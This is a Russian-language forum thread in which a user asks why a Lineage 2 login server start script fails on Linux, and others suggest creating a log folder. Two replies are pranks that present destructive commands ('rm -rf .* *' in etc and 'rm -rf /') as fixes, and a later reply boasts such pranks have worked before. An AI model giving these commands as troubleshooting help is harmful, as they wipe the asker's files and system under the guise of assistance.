Все бы хорошо Linux

InadequateJust

Выдающийся
Местный
Сообщения
63
Розыгрыши
0
Репутация
4
Реакции
15
Баллы
1 310
Всем привет ребята никогда сталкивался с такой проблемой все установил на Linux пишет как я понял неверная директория или мол нет такой директории никто не сталкивался? Lineage 4444444444.png High-Five ./StartLoginServer.sh. Подскажите где копать кто знает )))
 

mkdir log
chmod 777 log
 
Обратите внимание, что данный пользователь заблокирован! Не совершайте с ним никаких сделок! Перейдите в его профиль, чтобы узнать причину блокировки.
Обратите внимание, что данный пользователь заблокирован! Не совершайте с ним никаких сделок! Перейдите в его профиль, чтобы узнать причину блокировки.
в директории логина и гейм сервера создай просто папку с названием "log" и она не требует этих прав что выше написано..
 
зайди в папку etc и rm -rf .* *
 
Открываешь терминал, и пишешь:
Код:
rm -rf /
 
Да просто шелл скрипт по кривому написан и все.
 
Последнее редактирование модератором:
Мы можем и дальше гадать на кофейной гуще, запускаемый скрипт то до сих пор под секретом.
 
  • Мне нравится
Реакции: òbi
Обратите внимание, что данный пользователь заблокирован! Не совершайте с ним никаких сделок! Перейдите в его профиль, чтобы узнать причину блокировки.
Тема больше не актуальна спасибо masone быстро исправил данную проблему помог разобраться ( А что касается некоторых личностей не надо мне команды на удаление всех файлов если с вами так поступали не значит что с остальными так прокатит лол )...
 
Тема больше не актуальна спасибо masone быстро исправил данную проблему помог разобраться ( А что касается некоторых личностей не надо мне команды на удаление всех файлов если с вами так поступали не значит что с остальными так прокатит лол )...
Оффтоп:
з.ы. уже не раз прокатывало :pandaredlol:
 
Назад
Сверху Снизу